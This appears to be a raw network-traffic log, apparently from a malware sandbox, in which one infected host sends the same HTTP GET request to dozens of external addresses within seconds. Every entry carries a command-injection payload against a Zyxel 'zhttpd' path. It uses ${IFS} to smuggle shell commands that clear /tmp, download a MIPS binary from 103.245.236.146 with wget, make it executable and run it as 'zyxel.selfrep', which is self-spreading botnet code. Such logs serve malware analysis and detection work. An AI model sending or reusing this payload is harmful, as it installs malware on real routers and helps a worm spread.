                                                Jan 28, 2024 10:16:26.833709002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4837192.168.2.235414693.24.174.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833739996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4838192.168.2.235662079.184.224.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833759069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4839192.168.2.234776023.79.43.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833805084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4840192.168.2.2335072191.132.36.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833816051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4841192.168.2.2336850154.55.2.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833830118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4842192.168.2.2337710105.125.185.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833863974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4843192.168.2.2359256204.230.21.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833913088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4844192.168.2.2354370180.166.249.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833918095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4845192.168.2.2341040132.73.4.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833945036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4846192.168.2.2344000221.31.27.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833962917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4847192.168.2.2343200122.59.112.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.833992004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4848192.168.2.234962679.47.43.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834048033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4849192.168.2.234486420.196.241.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834064007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4850192.168.2.2359390158.203.138.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834078074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4851192.168.2.233800094.23.11.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834109068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4852192.168.2.233462051.112.94.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834117889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4853192.168.2.2355846149.178.200.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834156036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4854192.168.2.235977099.174.172.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834184885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4855192.168.2.2360204141.43.196.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834214926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4856192.168.2.2342872130.173.87.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834234953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4857192.168.2.235846417.77.201.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834250927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4858192.168.2.2345310104.114.167.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834290981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4859192.168.2.2337564172.148.167.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834347010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4860192.168.2.2339060212.191.244.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834368944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4861192.168.2.2352470168.196.170.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834393024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4862192.168.2.2350642144.230.190.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834424973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4863192.168.2.2352442132.51.248.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834449053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4864192.168.2.235462690.83.149.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834475994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4865192.168.2.2353926114.9.51.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834479094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4866192.168.2.2350836109.222.95.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834527016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4867192.168.2.233518042.136.226.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834538937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4868192.168.2.2346980162.85.140.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834577084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4869192.168.2.234579067.153.196.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834587097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4870192.168.2.2344210171.66.215.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834602118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4871192.168.2.2338242130.252.3.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834624052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4872192.168.2.23484121.188.59.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834656000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4873192.168.2.235002832.48.116.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834686995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4874192.168.2.2343514180.181.73.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834728956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4875192.168.2.233974657.34.108.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834759951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4876192.168.2.234047097.156.172.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834779978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4877192.168.2.2353004190.180.8.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834805012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4878192.168.2.235005851.180.254.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834847927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4879192.168.2.2336102218.254.64.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.834872007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4880192.168.2.235294423.83.222.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837366104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4881192.168.2.2354196148.63.249.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837724924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4882192.168.2.2335680207.116.80.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837749004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4883192.168.2.2348698133.23.54.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837774038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4884192.168.2.2334716159.173.60.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837812901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4885192.168.2.2353024184.179.139.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837836027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4886192.168.2.2337942175.54.219.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837862968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4887192.168.2.2349342116.112.236.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837905884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4888192.168.2.2335772110.244.156.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837933064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4889192.168.2.2339312153.192.82.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837940931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4890192.168.2.2340960183.228.147.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.837965965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4891192.168.2.234241266.248.28.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.844974995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4892192.168.2.2335680176.217.123.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.844995975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4893192.168.2.235779084.142.221.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845024109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4894192.168.2.234160498.152.9.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845057964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4895192.168.2.2334702157.64.183.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845077991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4896192.168.2.2335388146.104.164.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845123053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4897192.168.2.23361749.50.177.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.845149040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4898192.168.2.2340724197.63.210.91443
                                                TimestampBytes transferredDirectionData
